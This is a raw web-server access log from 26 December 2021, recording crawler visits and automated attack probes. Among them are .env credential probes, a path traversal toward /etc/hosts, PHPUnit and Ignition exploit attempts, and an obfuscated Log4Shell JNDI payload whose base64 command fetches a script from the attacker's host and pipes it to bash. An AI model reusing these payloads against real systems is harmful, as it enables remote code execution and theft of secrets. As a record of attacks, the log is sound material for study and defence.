195.54.160.149 - - [26/Dec/2021:01:15:57 +0100] "-" 408 - "-" "-" 35.87.105.162 - - [26/Dec/2021:01:38:48 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.187.62.214 - - [26/Dec/2021:01:39:27 +0100] "GET /favicon.ico HTTP/1.1" 301 302 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 80.82.77.192 - - [26/Dec/2021:02:25:09 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 167.94.138.113 - - [26/Dec/2021:03:42:31 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 167.94.138.113 - - [26/Dec/2021:03:42:31 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 185.225.39.112 - - [26/Dec/2021:04:20:07 +0100] "GET /~app/.env HTTP/1.1" 301 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.225.39.112 - - [26/Dec/2021:04:20:08 +0100] "POST /~app/.env HTTP/1.1" 301 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.225.39.112 - - [26/Dec/2021:04:20:08 +0100] "GET /~api/.env HTTP/1.1" 301 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.225.39.112 - - [26/Dec/2021:04:20:09 +0100] "POST /~api/.env HTTP/1.1" 301 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.225.39.112 - - [26/Dec/2021:04:20:10 +0100] "GET /~admin/.env HTTP/1.1" 301 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.225.39.112 - - [26/Dec/2021:04:20:11 +0100] "POST /~admin/.env HTTP/1.1" 301 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 195.54.160.149 - - [26/Dec/2021:04:31:32 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 301 318 "https://86.59.113.102:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 131.220.6.152 - - [26/Dec/2021:04:50:29 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 162.142.125.59 - - [26/Dec/2021:05:43:04 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 162.142.125.59 - - [26/Dec/2021:05:43:04 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 40.77.167.42 - - [26/Dec/2021:05:59:43 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 195.54.160.149 - - [26/Dec/2021:06:34:23 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 301 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 35.195.93.98 - - [26/Dec/2021:06:54:50 +0100] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.26.0" 195.54.160.149 - - [26/Dec/2021:07:30:56 +0100] "GET /_ignition/execute-solution HTTP/1.1" 301 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 206.189.56.55 - - [26/Dec/2021:07:46:28 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 195.54.160.149 - - [26/Dec/2021:08:37:38 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 212.227.12.174 - - [26/Dec/2021:09:03:22 +0100] "GET /wp-admin/css/ HTTP/1.1" 301 305 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 64.62.197.152 - - [26/Dec/2021:09:17:20 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 192.241.213.77 - - [26/Dec/2021:09:21:03 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.203.164 - - [26/Dec/2021:09:30:57 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 195.54.160.149 - - [26/Dec/2021:10:42:51 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==} HTTP/1.1" 301 435 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==}" 167.99.133.28 - - [26/Dec/2021:10:44:05 +0100] "GET / HTTP/1.1" 400 379 "-" "-" 167.99.133.28 - - [26/Dec/2021:10:44:41 +0100] "GET / HTTP/1.1" 301 383 "-" "l9tcpid/v1.1.0" 167.99.133.28 - - [26/Dec/2021:10:44:43 +0100] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 293 "-" "Lkx-TraversalHttpPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)" 167.99.133.28 - - [26/Dec/2021:10:44:43 +0100] "GET /.DS_Store HTTP/1.1" 301 307 "-" "Go-http-client/1.1" 167.99.133.28 - - [26/Dec/2021:10:44:44 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "l9explore/1.3.0" 167.99.133.28 - - [26/Dec/2021:10:44:45 +0100] "GET /login.action HTTP/1.1" 301 311 "-" "l9explore/1.3.0" 167.99.133.28 - - [26/Dec/2021:10:44:45 +0100] "GET / HTTP/1.1" 301 301 "-" "l9explore/1.3.0" 185.225.39.112 - - [26/Dec/2021:12:04:14 +0100] "GET /~app/.env HTTP/1.1" 301 303 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.225.39.112 - - [26/Dec/2021:12:04:15 +0100] "POST /~app/.env HTTP/1.1" 301 303 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.225.39.112 - - [26/Dec/2021:12:04:15 +0100] "GET /~api/.env HTTP/1.1" 301 303 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.225.39.112 - - [26/Dec/2021:12:04:16 +0100] "POST /~api/.env HTTP/1.1" 301 303 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.225.39.112 - - [26/Dec/2021:12:04:16 +0100] "GET /~admin/.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.225.39.112 - - [26/Dec/2021:12:04:17 +0100] "POST /~admin/.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.241.205.88 - - [26/Dec/2021:12:48:40 +0100] "GET /actuator/health HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 60.217.75.69 - - [26/Dec/2021:13:39:31 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0" 185.83.145.138 - - [26/Dec/2021:14:44:13 +0100] "GET /.env HTTP/1.1" 301 300 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.83.145.138 - - [26/Dec/2021:14:44:13 +0100] "GET /.env HTTP/1.1" 301 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.83.145.138 - - [26/Dec/2021:14:44:14 +0100] "POST /.env HTTP/1.1" 301 300 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.83.145.138 - - [26/Dec/2021:14:44:14 +0100] "POST /.env HTTP/1.1" 301 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 40.77.167.42 - - [26/Dec/2021:15:29:07 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 213.32.122.82 - - [26/Dec/2021:15:53:38 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 89.248.165.52 - - [26/Dec/2021:16:21:40 +0100] "-" 408 - "-" "-" 198.199.113.43 - - [26/Dec/2021:18:16:31 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 20.127.136.47 - - [26/Dec/2021:19:50:57 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 20.127.136.47 - - [26/Dec/2021:19:50:57 +0100] "POST / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 185.174.28.82 - - [26/Dec/2021:20:28:47 +0100] "GET /.env HTTP/1.1" 301 300 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.174.28.82 - - [26/Dec/2021:20:28:47 +0100] "GET /.env HTTP/1.1" 301 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.174.28.82 - - [26/Dec/2021:20:28:48 +0100] "POST /.env HTTP/1.1" 301 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.174.28.82 - - [26/Dec/2021:20:28:52 +0100] "POST /.env HTTP/1.1" 301 300 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 195.54.160.149 - - [26/Dec/2021:21:03:36 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 89.248.165.52 - - [26/Dec/2021:21:23:20 +0100] "-" 408 - "-" "-"